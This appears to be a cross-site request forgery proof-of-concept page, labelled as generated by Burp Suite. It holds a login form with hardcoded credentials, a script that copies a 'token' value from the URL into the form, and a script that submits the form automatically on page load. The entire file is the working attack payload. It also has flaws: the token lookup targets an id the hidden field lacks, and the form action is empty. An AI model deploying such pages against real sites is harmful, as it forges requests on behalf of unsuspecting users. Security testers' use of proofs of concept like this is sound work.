<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>
function get(name){
   if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
      document.getElementById("token").value = decodeURIComponent(name[1]);
}
</script>

    <form method="POST" action="" id="csrf">
					<div class="form-group">
						<input type="text" class="form-control" name="Rusername" placeholder="Username" value="matthieu">
					</div>
					<div class="form-group">
						<input type="password" class="form-control" name="Rpassword" placeholder="Password" value="matthieu">
					</div>
						<input type="hidden" name="token" value="">
					<div class="form-group">
						<input type="submit" class="btn btn-primary btn-lg btn-block" value="Submit" disabled="disabled">
					</div>
<script>get('token')</script>
      <script>document.getElementById("csrf").submit()</script>
				</form>
  </body>
</html>